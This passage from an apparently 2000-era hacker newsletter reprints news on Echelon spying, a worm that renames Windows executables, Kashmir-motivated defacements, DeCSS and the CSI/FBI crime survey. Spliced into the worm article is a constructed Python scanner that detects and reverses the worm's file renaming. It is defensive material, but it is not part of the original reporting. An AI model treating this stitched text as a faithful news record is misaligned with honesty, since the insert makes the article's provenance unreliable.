See transcript of Woolsey's March 7 remarks on economic espionage to the Foreign Press Center: http://cryptome.org/echelon-cia.htm

The Wall Street Journal, March 17, 2000

Why We Spy on Our Allies

By R. James Woolsey, a Washington lawyer and a former Director of Central Intelligence.

What is the recent flap regarding Echelon and U.S. spying on European industries all about? We'll begin with some candor from the American side. Yes, my continental European friends, we have spied on you. And it's true that we use computers to sort through data by using keywords. Have you stopped to ask yourselves what we're looking for?

The European Parliament's recent report on Echelon, written by British journalist Duncan Campbell, has sparked angry accusations from continental Europe that U.S. intelligence is stealing advanced technology from European companies so that we can -- get this -- give it to American companies and help them compete. My European friends, get real. True, in a handful of areas European technology surpasses American, but, to say this as gently as I can, the number of such areas is very, very, very small. Most European technology just isn't worth our stealing.

Why, then, have we spied on you?
The answer is quite apparent from the Campbell report -- in the discussion of the only two cases in which European companies have allegedly been targets of American secret intelligence collection. Of Thomson-CSF, the report says: "The company was alleged to have bribed members of the Brazilian government selection panel." Of Airbus, it says that we found that "Airbus agents were offering bribes to a Saudi official." These facts are inevitably left out of European press reports.

That's right, my continental friends, we have spied on you because you bribe. Your companies' products are often more costly, less technically advanced or both, than your American competitors'. As a result you bribe a lot. So complicit are your governments that in several European countries bribes still are tax-deductible.

When we have caught you at it, you might be interested, we haven't said a word to the U.S. companies in the competition. Instead we go to the government you're bribing and tell its officials that we don't take kindly to such corruption. They often respond by giving the most meritorious bid (sometimes American, sometimes not) all or part of the contract. This upsets you, and sometimes creates recriminations between your bribers and the other country's bribees, and this occasionally becomes a public scandal. We love it.

Why do you bribe? It's not because your companies are inherently more corrupt. Nor is it because you are inherently less talented at technology. It is because your economic patron saint is still Jean Baptiste Colbert, whereas ours is Adam Smith. In spite of a few recent reforms, your governments largely still dominate your economies, so you have much greater difficulty than we in innovating, encouraging labor mobility, reducing costs, attracting capital to fast-moving young businesses and adapting quickly to changing economic circumstances. You'd rather not go through the hassle of moving toward less dirigisme. It's so much easier to keep paying bribes.
The Central Intelligence Agency collects other economic intelligence, but the vast majority of it is not stolen secrets. The Aspin-Brown Commission four years ago found that about 95% of U.S. economic intelligence comes from open sources.

The Campbell report describes a sinister-sounding U.S. meeting in Washington where -- shudder! -- CIA personnel are present and the participants -- brace yourself -- "identify major contracts open for bid" in Indonesia. Mr. Campbell, I suppose, imagines something like this: A crafty CIA spy steals stealthily out of a safe house, changes disguises, checks to make sure he's not under surveillance, coordinates with a spy satellite and . . . buys an Indonesian newspaper. If you Europeans really think we go to such absurd lengths to obtain publicly available information, why don't you just laugh at us instead of getting in high dudgeon?

What are the economic secrets, in addition to bribery attempts, that we have conducted espionage to obtain? One example is some companies' efforts to conceal the transfer of dual-use technology. We follow sales of supercomputers and certain chemicals closely, because they can be used not only for commercial purposes but for the production of weapons of mass destruction. Another is economic activity in countries subject to sanctions -- Serbian banking, Iraqi oil smuggling.

But do we collect or even sort secret intelligence for the benefit of specific American companies? Even Mr. Campbell admits that we don't, although he can't bring himself to say so except with a double negative: "In general this is not incorrect." The Aspin-Brown Commission was more explicit: "U.S. Intelligence Agencies are not tasked to engage in 'industrial espionage' -- i.e. obtaining trade secrets for the benefit of a U.S. company or companies."

The French government is forming a commission to look into all this. I hope the commissioners come to Washington. We should organize two seminars for them.
One would cover our Foreign Corrupt Practices Act, and how we use it, quite effectively, to discourage U.S. companies from bribing foreign governments. A second would cover why Adam Smith is a better guide than Colbert for 21st-century economies. Then we could move on to industrial espionage, and our visitors could explain, if they can keep straight faces, that they don't engage in it. Will the next commission pursue the issue of rude American maitre d's?

Get serious, Europeans. Stop blaming us and reform your own statist economic policies. Then your companies can become more efficient and innovative, and they won't need to resort to bribery to compete. And then we won't need to spy on you.

@HWA

48.0 HNN:Mar 20th:LAPD Tells Parody Site To Chill
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Rho

The Computer Crimes Division of the L.A. County Sheriff's Department has forced www.fortheloveofjulie.com to alter its content. Fearing that the fake stalking site was a little too real and that it could hamper probes of real crimes they strongly suggested that the owner make changes to the site or take it down. The site is meant to be entertaining and spooky similar to 'The Blair Witch Project'.

CNN
http://www.cnn.com/2000/TECH/computing/03/17/julie.folo/index.html

Authorities tell faux-stalker site to tone it down
March 17, 2000
Web posted at: 8:46 p.m. EST (0146 GMT)

By D. Ian Hopper
CNN Interactive Technology Editor

(CNN) -- After getting over 2 million page views, the authors of a faux-stalker site got a call from someone who wasn't such a fan -- a police detective.

A detective from the Computer Crimes Division of the L.A. County Sheriff's Department contacted Spark Factory president Tim Street Friday.
According to authorities, the detective strongly suggested that Street take down FortheloveofJulie.com, a fake stalker site that aims to be an entertaining but spooky story in the tradition of last year's "The Blair Witch Project" phenomenon.

The site is a shrine to "Julie" from her admirer, a video-store clerk who follows her home and to her work, taking videos and posting a journal complete with movie clips and pictures. The site has become very popular, Street says, through both word-of-mouth and media attention.

While it's completely fake, many users failed to see a disclaimer because they're going through a publicized back door that bypasses SpookySites.com, where it's indexed. SpookySites contains a small disclaimer upon entering the site that informs users that the content within "may contain fictionalization."

But like many others, the detective entered the site through a back door, missing the disclaimer. When he called Street, the site's author was skeptical.

"He told me he was with the police department. I wanted to call him back to make sure, because practical jokes around here are running rampant," Street said. "One guy here said he was from the FBI."

"We received a tip from an investigator on the East Coast," says Sgt. Larry Balich. Authorities found a photo in the site that clearly showed a vehicle and license plate, and traced it back to Street.

"We thought we had a stalking situation on our hands," Balich says. "But we needed a victim. You can't investigate a case without a victim or witness, and we had neither."

After contacting the district attorney's office, detectives found that no crime had been committed. Still, Street says, police "strongly suggested" that he take the site down or close the back door and make the disclaimer more obvious.

"We're going to frame it inside CreepySites," Street said. "We'll have a bolder disclaimer that says FortheloveofJulie is fictitious, and Julie is not in any danger."
"We don't think we have to," he says, "but we don't want to have any problems."

Balich says the site was just a little too real and could hamper probes of real crimes.

"It's troublesome to have something like this on the Internet," Balich says. "I consider it a misuse of a real positive thing."

The site was taken down for most of the day but came back up in the afternoon with the intended changes. Street says he made the site as an "Internet soap opera" meant to entertain users who were in for a suspenseful thrill.

"It's not our intent to be evil, creepy people," he says. "We're trying to showcase how this new experience can change entertainment on the Internet."

Street says he has already left a message with the FBI to try to head off any more misunderstandings.

@HWA

49.0 HNN:Mar 20th:New Windows Worm Virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

A new worm virus that can shut down MS Windows platforms and make the operating system permanently unusable has been discovered by Computer Associates International. Once launched via MS Outlook under Windows 95, 98, 2000 or NT, Win32/Melting.Worm saves itself into a Windows directory under the name MeltingScreen.exe. It renames .exe files into .bin files.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,15777,00.html

Windows ‘Worm’ Virus Slithers
Computer Associates identifies virus that travels through Outlook.

by Kathleen Ohlson, Computerworld
March 17, 2000, 6:56 a.m. PT

A new worm now "in the wild" has the potential to shut down Windows platforms and make the operating system permanently unusable.

Computer Associates International discovered the worm, Win32/Melting.worm, on Tuesday, when customers started to find it in their e-mail systems, says Narender Mangalam, director of security solutions at CA. So far, it has hit some Fortune 1000 software companies, he says.
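An added example, not from the article or from Computer Associates: a Python scan for the two artifacts of the worm behaviour described above, a MeltingScreen.exe dropper in the Windows directory and .exe files renamed to .bin. The "infected" directory is constructed inline for the demo, and using the PE "MZ" signature to tell a renamed executable from a genuine .bin data file is my assumption, not something the article states.

```python
"""Scan a directory for Win32/Melting.worm artifacts.

Constructed example. The worm copies itself to the Windows directory as
MeltingScreen.exe and renames *.exe there to *.bin.  A Windows executable
starts with the two bytes "MZ", so a .bin file carrying that header is a
strong hint that an .exe was renamed (assumption used here, not from the
article).  The scan takes any directory, so it can be pointed at a mounted
disk image during incident response.
"""
import os
import tempfile

PE_MAGIC = b"MZ"
WORM_DROPPER = "meltingscreen.exe"   # name from the article, compared case-insensitively


def is_pe_file(path):
    """Return True if the file begins with the DOS/PE 'MZ' signature."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == PE_MAGIC
    except OSError:
        return False


def scan_windows_dir(win_dir):
    """Scan one directory (non-recursive) for Melting worm artifacts.

    Returns a dict with:
      dropper - path of MeltingScreen.exe if present, else None
      renamed - list of .bin files that are really PE executables
    """
    findings = {"dropper": None, "renamed": []}
    for name in sorted(os.listdir(win_dir)):
        path = os.path.join(win_dir, name)
        if not os.path.isfile(path):
            continue
        lower = name.lower()
        if lower == WORM_DROPPER:
            findings["dropper"] = path
        elif lower.endswith(".bin") and is_pe_file(path):
            findings["renamed"].append(path)
    return findings


def restore_names(findings, dry_run=True):
    """Map each renamed .bin back to its original .exe name.

    With dry_run=True nothing is touched; the mapping is returned so an
    analyst can review it first.  Restoring only makes sense after the
    dropper has been removed and the host is offline.
    """
    plan = {}
    for path in findings["renamed"]:
        original = path[:-4] + ".exe"
        plan[path] = original
        if not dry_run and not os.path.exists(original):
            os.rename(path, original)
    return plan


def build_sample_windows_dir():
    """Create a constructed directory that mimics an infected Windows dir."""
    root = tempfile.mkdtemp(prefix="melting_demo_")
    # Constructed dropper: a fake MZ header is enough for the demo.
    with open(os.path.join(root, "MeltingScreen.exe"), "wb") as fh:
        fh.write(PE_MAGIC + b"\x90" * 62)
    # Two executables the worm has renamed to .bin (still PE inside).
    for name in ("notepad.bin", "regedit.bin"):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(PE_MAGIC + b"\x00" * 62)
    # A legitimate data file with a .bin extension, not a PE: must be ignored.
    with open(os.path.join(root, "fonts.bin"), "wb") as fh:
        fh.write(b"\x00\x01\x02\x03")
    # An untouched executable: must be ignored.
    with open(os.path.join(root, "explorer.exe"), "wb") as fh:
        fh.write(PE_MAGIC + b"\x00" * 62)
    return root


if __name__ == "__main__":
    sample = build_sample_windows_dir()
    result = scan_windows_dir(sample)
    print("dropper:", result["dropper"])
    for src, dst in restore_names(result).items():
        print("would restore", src, "->", dst)
```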
"The risk level is moderate, and it hasn't caused too much damage because we believe we've caught it in time," Mangalam says. CA markets InoculateIT, a virus detection and prevention program.

The Melting Worm is unleashed through Microsoft's Outlook running on Windows 95, 98, 2000, or NT, according to CA representatives. Once launched, the worm puts a copy of itself into a Windows directory as MeltingScreen.exe and remains in memory. Files with .exe extensions in a system's Windows directory are renamed with .bin extensions. As the worm renames files, including ones critical to operating Windows, these changes may render the operating system useless.

The worm also starts to e-mail itself to all the names in a victim's Outlook address book and randomly executes other .exe files, Mangalam says. This potentially can take down a company's e-mail system.

@HWA

50.0 HNN:Mar 20th:GNIT Now Freeware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by m0nk

Ellicit Organization has released a freeware version of their latest program, GNIT NT Vulnerability Scanner. The scanner checks for over a dozen NT vulnerabilities.

Ellicit.org
http://security.ellicit.org/

@HWA

51.0 HNN:Mar 20th:Online Criminals Labeled Boffins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by dogcow

The Australian Federal Police Commissioner, Mick Palmer, was recently quoted as saying that while much of online crime is currently "in the early stages it is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent." (Glad to see that Australia is on top of Internet crime.)
Sydney Morning Herald
http://www.smh.com.au/news/0003/18/national/national6.html

NATIONAL

'Police must get ahead of e-crime'
By JANINE ISRAEL

Undetected organised electronic-crime could undermine the nation's security and financial stability, the Australian Federal Police Commissioner, Mr Mick Palmer, warned yesterday.

He told a conference of Australasian and south-west Pacific police commissioners in Canberra that a co-ordinated international response was required urgently to crack down on electronic terrorism, child pornography, racism, fraud and money laundering.

Mr Palmer said the Internet meant crimes were being committed in countries where perpetrators had "never set foot" and international legislation and treaties must be set up to prosecute criminals irrespective of national borders.

Australia, New Zealand, Fiji and Papua New Guinea police commissioners announced they would establish an Australasian Law Enforcement Electronic Crime Strategy to address the issue.

Mr Palmer said the Australian police force lacked electronic expertise, and were looking to recruit computer boffins to tackle electronic crime.

"We need to be buying those skills from the cutting edge of the technological workplace. We need to form close partnerships with the private sector and wider government agencies," he said.

But employing people with the skills to fight electronic crime was costly. Retention was a problem in a competitive market where those with technological skills were lured by high salaries to the private sector.

The international nature of cyberspace made it almost impossible to identify perpetrators let alone snare electronic criminals.

Credit card fraud already was costing the credit card industry billions, Mr Palmer said. He said growing forms of e-crime included such things as money laundering and tax evasion. Cyber-stalking, illegal interceptions or "electronic eavesdropping" were a concern, as were political and industrial espionage.
Fraudulent sales pitches along with bogus charitable or investment solicitations were increasingly common. These were not necessarily "new crimes", Mr Palmer said, just "new methods to commit traditional crimes".

"One of the difficulties with electronic crime is that not only is it very intrusive and superficially invisible, but many crimes can be committed without the victim knowing it has been committed," he said.

While e-crime is still in its "embryo state", authorities predict it will expand with the electronic market to become more organised and sophisticated.

"Much of it in the early stages is being done by people who simply are boffins and are doing it by way of exploration rather than criminal intent. The damage caused by those activities is of course equally serious," he said.

He said police were "alarmed" by the capability of people to commit offences on a global basis, with complete anonymity, with speed and on a large scale.

A staggering 900 million people were expected to be using the Internet by the end of the year.

@HWA

52.0 HNN:Mar 21st: Conflict In Kashmir Continues Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre

Over 600 web sites in India including government systems have been defaced in recent months by people in Pakistan. The conflict in Kashmir is seen as one of the primary reasons for the defacements.

CNN
http://www.cnn.com/2000/TECH/computing/03/20/pakistani.hackers/index.html

Kashmir conflict continues to escalate -- online

By D. Ian Hopper
CNN Interactive Technology Editor

March 20, 2000
Web posted at: 8:15 p.m. EST (0115 GMT)

(CNN) -- A group of Pakistani hackers has used the conflict in Kashmir as a reason to deface almost 600 Web sites in India and take control of several Indian government and private computer systems, according to the group.

A computer security Web site -- attrition.org -- has records of the defacements claimed by the Muslim Online Syndicate.
The M0S, which a member says consists of mostly Pakistani Muslims, is made up of self-proclaimed "hacktivists," those who commit computer crimes -- ranging from simple defacement to full-scale intrusions to denial of service attacks -- in order to bring attention to a social cause.

The group has nine active members, according to a representative who spoke on behalf of the group on condition of anonymity. They range from 16 to 24 years old, the representative said. Several of them are students or computer professionals, and one is a medical student, the representative added.

Unlike the majority of Web vandals, the MOS members say they secretly take control of a server, then deface the site only when they "have no more use" for the data or the server itself.

"The servers we control range from harmless mail and Web services to 'heavy duty' government servers," says the MOS representative. "The data is only being categorically archived for later use if deemed necessary."

The group says it's not interested in e-commerce sites or credit card information.

Most of the group's defacements came in one fell swoop, when they broke into India's largest Internet service provider, IndiaLinks. While there, they defaced more than 500 sites hosted by the company, including many travel and company sites, IndiaLinks confirms.

IndiaLinks, based in Bombay, hosts more than 6,000 Web sites, according to CEO Bhavin Chandarana. Chandarana says the group had access to servers co-hosted by Alabanza, an American ISP. He says the group had access for about an hour.

The MOS won't be facing any legal problems stemming from its exploits, Chandarana says, because IndiaLinks was not able to get the server logs from Alabanza. Chandarana says his company is in the process of removing their business from the U.S. ISP.

Representatives for Alabanza did not respond to several e-mails and two phone messages requesting comment.

One of the Web sites defaced was that of the Indian Science Congress 2000.
The ISC's local organizing secretary, Bhushan Patwardhan, told The Hindu newspaper that the defacement was removed as soon as it was detected.

The MOS has a Web site mirroring its attacks that contains a well-known expletive. Expletives in domain names used to be taboo, but with the deregulation of domain registration, it is no longer forbidden.

"We hope to bring the Kashmir conflict to the world's attention," MOS says. "We wish to see the day when our Muslim brethren will be given the right to choose, as was promised them half a century ago."

India and Pakistan have fought two wars over the last half-century over rival claims for the Himalayan territory of Kashmir. They clashed again last summer when Pakistan-based fighters seized mountain peaks inside India. Hundreds of militants died before India and Pakistan -- under international and domestic pressure -- withdrew their forces.

Ignoring world pressure, India and Pakistan both tested nuclear devices in 1998, dramatically escalating tensions.

The stated goal of the MOS -- social action through hacking -- is becoming a more popular one. Hacktivists attacked the World Trade Organization Web site during their Seattle conference last year, and a mailing list helps concerned activists discuss strategy, targets and coordinate attacks. Rather than simply defacing sites, denial of service attacks have become the weapon of choice.

Alex Fowler, Strategic Initiatives Director for the Electronic Frontier Foundation, predicted this escalation in October 1999 in an interview with CNN Interactive.

"We will see very serious attacks. Information stealing could have very long-term consequences for consumers," Fowler said.

@HWA

53.0 HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Army Maj. Sheryl French has said that the possibility exists for intruders to infiltrate the computer systems used in tanks and other armored vehicles. Modern tanks and ships make extensive use of computers, software and data communications links for functions such as navigation, targeting and command and control. DISA has already tested the possibility of inputting false navigation data into a ship's computer from an unauthorized land based laptop.

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0320/web-hacker-03-21-00.asp

Hacker-controlled tanks, planes and warships?

BY Dan Verton
03/21/2000

Army officials are worried that sophisticated hackers and other cybercriminals, including military adversaries, may soon have the ability to hack their way into and take control of major military weapon systems such as tanks and ships.

Speaking this month at the annual Army Directors of Information Management Conference in Houston, Army Maj. Sheryl French, a program manager responsible for the Army’s Information Assurance Architecture for the Digitized Force, said the potential exists for hackers to infiltrate the computer systems used in tanks and other armored vehicles.

Unlike in the past, today’s modern tanks and ships are almost entirely dependent on computers, software and data communications links for functions such as navigation, targeting and command and control. Although the Pentagon has always had computer security issues to deal with, "we’ve never had computers" in tanks and armored personnel carriers before, said French, pointing to a picture of an M-1 Abrams Main Battle Tank.

In fact, the Defense Department has already tested and proven that hackers have the ability to infiltrate the command and control systems of major weapons, including Navy warships.
According to a training CD-ROM on information assurance, published by the Defense Information Systems Agency, an Air Force officer sitting in a hotel room in Boston used a laptop computer to hack into a Navy ship at sea and implant false navigation data into the ship’s steering system.

"Yes, this actually happened," the CD-ROM instructs military personnel taking the course. "Fortunately, this was only a controlled test to see what could be done. In reality, the type of crime and its objective is limited only by people’s imagination and ability."

John Pike, a defense and intelligence analyst with the Federation of American Scientists, said that although there are well-known security gaps in the commercial systems that the Army plans to use on the battlefield, hacking into tanks and other weapons may prove to be too difficult for an enemy engaged in battle.

"The problem for the enemy is that computer security vulnerabilities will almost certainly prove fleeting and unpredictable," said Pike, adding that such tactics would be nearly impossible to employ beyond the random harassment level.

@HWA

54.0 HNN:Mar 21st:2600 AU to Broadcast DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by hool

In yet another twist in the MPAA vs. DeCSS case, 2600 of Australia plans to broadcast the source code of DeCSS on national TV. Australian Federal copyright laws cannot currently prevent this broadcast. The information will be displayed at 12 frames per second; it is recommended that viewers tape record the information and review it later frame by frame. The code is expected to air sometime in the next few weeks between 3 and 4 am.
Computerworld AU
http://www.computerworld.idg.com.au/CWT1997.nsf/cwtoday/DB6C6D9B3448ECE64A2568A00075454B?OpenDocument

2600 AU
http://www.2600.org.au

ComputerWorld; Hackers with heart

By Byron Kaye
13 March, 2000

SYDNEY - Loopholes in Federal laws mean hacker advocate group 2600 Australia will be able to broadcast DVD decryption codes and other sensitive information on national television within weeks.

Grant Bayley, who heads up 2600 Australia, the international organisation's Australian operation, said it was currently devising a 15-second broadcast, which he said would contain text files, delivered at 12 frames per second, and suggestions pertaining to the "ethics" of datacasting, computer security and privacy, and access-controlling DVD encryption.

Bayley said the text contained in the broadcast would not be comprehensible as it appeared live on television, but he suggested viewers record the broadcast on video and then watch the information afterwards "frame by frame".

Bayley said the broadcast would be "fed" to Channel 10 by MindShare, a company that supplies advertising material in bulk for the television station. MindShare's own advertising slogan is "Head space invaders".

The broadcast time was not yet known, but Bayley said it was expected to screen between 3:00 and 4:00 am "some time in the next few weeks".

Bayley maintained information contained in the broadcast would "primarily encourage ethical", educational use of new technologies such as datacasting. However, he admitted some information -- pertaining to the decryption of DVD access codes -- which could not be legally broadcast in the US, would be screened.

Australian Federal copyright laws, even those currently being amended, were unable to prevent broadcasting of information such as DVD decryption codes, regardless of how commercially crippling the information might potentially be, he said.
Bayley said he was convinced that he knew the 15-year-old hacker who penetrated the ASX website two weeks ago "pretty well". The ASX hack caused an outage of four hours, leaving the site littered with banner messages reading "Prosthetic owns the ASX". Bayley maintained 2600 did not support or encourage vandalistic hack attacks such as this. "Stupid people do stupid things," he said. The title "2600" refers to the frequency of pitch that technology-savvy Americans played into their telephone receivers to thwart long distance call charges in the early 1980s. @HWA 55.0 HNN:Mar 21st:CIA Monitoring Upheld by Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The CIA's Foreign Bureau of Information Services policy allowing agency officials to monitor employees' Internet use has been upheld by federal appeals court. The policy included provisions to review employees' e-mail messages and to collect information on their Web site visits. The policy had helped convict a federal employee of downloading child pornography on government time. Government Executive Magazine http://www.govexec.com/dailyfed/0300/032000m1.htm March 20, 2000 DAILY BRIEFING Court upholds agency reviews of employees' Internet use By Kellie Lunney klunney@govexec.com A federal appeals court has upheld a CIA policy allowing agency officials to monitor employees' Internet use. The policy had helped convict a federal employee of downloading child pornography on government time. The CIA's Foreign Broadcast Information Service implemented a policy in June 1998 authorizing "electronic audits" of employee computers in order to crack down on non-business related Internet use. Those audits included reviewing employees' e-mail messages and collecting information on their Web site visits. Later that summer, Science Applications International Corp. 
(SAIC), which had a contract to manage FBIS' computer network and monitor inappropriate Internet behavior, alerted the agency when the keyword "sex" turned up numerous hits in a firewall database during a routine test. The hits originated from the computer of Mark L. Simons, an electronic engineer at FBIS.

FBIS officials then searched Simons' computer and office on four occasions, eventually compiling enough evidence to indict him on two counts of knowingly receiving and possessing child pornography downloaded from the Internet and stored on his government hard drive.

Simons claimed that his Fourth Amendment rights had been violated during the searches. But a district court upheld the searches. Simons was found guilty and was sentenced to 18 months in jail.

The U.S. Court of Appeals for the Fourth Circuit affirmed that decision in late February, saying that Simons failed to prove that he had a "legitimate expectation of privacy in the place searched or the item seized."

According to the appeals court, "In the final analysis, this case involves an employee's supervisor entering the employee's government office and retrieving a piece of government equipment in which the employee had absolutely no expectation of privacy [due to the agency's Internet policy]—equipment that the employer knew contained evidence of crimes committed by the employee in the employee's office ... Here, there was a conjunction of the conduct that violated the employer's policy and the conduct that violated the criminal law."

The court's decision in USA v. Simons (99-4238) is online at www.law.emory.edu/4circuit/feb2000/994238.p.html.

@HWA

56.0 HNN:Mar 21st:Make Your Reservations for RootFest Now!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by rootfest

RootFest is back for its second try. RootFest 2000 will be June 14-16, 2000, and will be held at the brand-new St. Paul RiverCentre facility just 15 minutes from the Mall of America.
Three days of speakers, events, contests and more is planned, making this a can't-miss event.

RootFest
http://www.rootfest.org/

@HWA

57.0 HNN:Mar 22nd:Cybercrime On The Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The Computer Security Institute and the San Francisco FBI Computer Intrusion Squad jointly released a report today that said that electronic crime cost companies at least $266 million last year. The study found that 70% of the responding companies detected the unauthorized use of their computer systems in the last 12 months up from 62% the year before. Insiders and disgruntled employees topped the lists of worrisome security threats. (One conclusion that can be drawn from this study is that e-crime is on the rise, another is that people are more willing to admit intrusions or that detection of criminal activity has gotten better. The numbers are interesting but really don't say anything.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471718,00.html?chkpt=zdnntop

Late Update 0943EST

An anonymous person was kind enough to send us a link directly to the summary results of the above mentioned survey.

Computer Security Institute
http://www.gocsi.com/prelea_000321.htm

ZDNet; Report: 'E-crime is booming'

Some 70 percent of companies queried in a new study have detected attacks on their networks, the FBI/CSI reports.

By Robert Lemos, ZDNet News
UPDATED March 22, 2000 10:00 AM PT

SAN FRANCISCO -- Just like e-commerce, electronic crime is a booming business, according to a survey released by the Computer Security Institute and the San Francisco FBI Computer Intrusion Squad on Wednesday.

The study found that 70 percent of CSI's 585 member companies that responded to its survey detected the unauthorized use of their computer systems in the last 12 months -- up from 62 percent the year before.

"Isn't e-commerce booming?
Then e-crime is booming," said Richard Power, editorial director and analyst for the Computer Security Institute. "The Internet revolution is going on regardless, but the more commerce that goes online, the more crime that goes online as well."

While not a scientific estimate of computer crime, the report does measure the anonymous admissions of more than 640 security professionals who are part of CSI.

Insiders the biggest fear

More than three-quarters of those professionals identified hackers as a security threat, but insiders concerned the respondents more, with 81 percent worried about disgruntled employees.

CSI's Power explained that professional hackers are more of a threat, however. "That's the real problem, not a juvenile hacker," he said. "The point is, if a 16-year-old kid can do (what we have seen), then what are the professionals doing?"

The report also indicates that corporate computer systems are far from secure. Almost 90 percent of the security professionals who answered the survey detected a security threat, which includes unauthorized access as well as improper use of a corporate computer or e-mail and computer viruses.

Of those intrusions, only 42 percent of the companies affected put a dollar sign on the amount of damage done. The total: $266 million.

With only one computer security administrator per 1,000 computers, the situation may not get any better soon.

-=-

CSI; Mar 22, 2000

FOR IMMEDIATE RELEASE

Contact: Patrice Rapalus, Director
Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
415/905-2310
Internet: prapalus@cmp.com

Ninety percent of survey respondents detect cyber attacks, 273 organizations report $265,589,940 in financial losses

SAN FRANCISCO -- The Computer Security Institute (CSI) announced today the results of its fifth annual "Computer Crime and Security Survey."
The "Computer Crime and Security Survey" is conducted by CSI with the participation of the San Francisco Federal Bureau of Investigation's (FBI) Computer Intrusion Squad. The aim of this effort is to raise the level of security awareness, as well as help determine the scope of computer crime in the United States.

Highlights of the "2000 Computer Crime and Security Survey" include the following:

Ninety percent of respondents (primarily large corporations and government agencies) detected computer security breaches within the last twelve months.

Seventy percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse"--for example, theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks.

Seventy-four percent acknowledged financial losses due to computer breaches.

Forty-two percent were willing and/or able to quantify their financial losses. The losses from these 273 respondents totaled $265,589,940 (the average annual total over the last three years was $120,240,180).

Financial losses in eight of twelve categories were larger than in any previous year. Furthermore, financial losses in four categories were higher than the combined total of the three previous years. For example, 61 respondents quantified losses due to sabotage of data or networks for a total of $27,148,000. The total financial losses due to sabotage for the previous years combined totaled only $10,848,850.

As in previous years, the most serious financial losses occurred through theft of proprietary information (66 respondents reported $66,708,000) and financial fraud (53 respondents reported $55,996,000).

Survey results illustrate that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming the trend in previous years.
Seventy-one percent of respondents detected unauthorized access by insiders. But for the third year in a row, more respondents (59%) cited their Internet connection as a frequent point of attack than cited their internal systems as a frequent point of attack (38%).

Based on responses from 643 computer security practitioners in U.S. corporations, government agencies, financial institutions, medical institutions and universities, the findings of the "2000 Computer Crime and Security Survey" confirm that the threat from computer crime and other information security breaches continues unabated and that the financial toll is mounting.

Respondents detected a wide range of attacks and abuses. Here are some other examples:

25% of respondents detected system penetration from the outside.
27% of respondents detected denial of service attacks.
79% detected employee abuse of Internet access privileges (for example, downloading pornography or pirated software, or inappropriate use of e-mail systems).
85% detected computer viruses.

For the second year, we asked some questions about electronic commerce over the Internet. Here are some of the results:

93% of respondents have WWW sites.
43% conduct electronic commerce on their sites (in 1999, it was only 30%).
19% suffered unauthorized access or misuse within the last twelve months.
32% said that they didn't know if there had been unauthorized access or misuse.
35% of those acknowledging attack, reported from two to five incidents. 19% reported ten or more incidents.
64% of those acknowledging an attack reported Web-site vandalism.
60% reported denial of service.
8% reported theft of transaction information.
3% reported financial fraud.

Patrice Rapalus, CSI Director, suggests that the "Computer Crime and Security Survey," now in its fifth year, has delivered on its promise to raise the level of security awareness and help determine the scope of crime in the United States.
"The trends the CSI/FBI survey has highlighted over the years are disturbing. Cyber crimes and other information security breaches are widespread and diverse. Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. The 273 organizations that were able to quantify their losses reported a total of $265,589,940. Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly adequate staffing and training of information security practitioners in both the private sector and government."

Bruce J. Gebhardt is in charge of the FBI's Northern California office. Based in San Francisco, his division covers fifteen counties, including the continually expanding "Silicon Valley" area. Computer crime is one of his biggest challenges.

"If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen. The results of the CSI/FBI survey provide us with valuable data. This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level but identifies emerging crime trends and helps me decide how best to proactively, and aggressively assign resources, before those 'trends' become 'crises.'"

###

CSI, established in 1974, is a San Francisco-based association of information security professionals. It has thousands of members worldwide and provides a wide variety of information and education programs to assist practitioners in protecting the information assets of corporations and governmental organizations.
The FBI, in response to an expanding number of instances in which criminals have targeted major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC) located at FBI headquarters and the Regional Computer Intrusion Squads located in selected offices throughout the United States. The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyber attacks on the nation's infrastructures. (These infrastructures include telecommunications, energy, transportation, banking and finance, emergency services and government operations). The mission of Regional Computer Intrusion Squads is to investigate violations of Computer Fraud and Abuse Act (Title 8, Section 1030), including intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes.

Copyright 2000 Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
Telephone: (415) 905-2626
Fax: (415) 905-2218.

@HWA

58.0 HNN:Mar 22nd:The Next Version of Windows Leaked
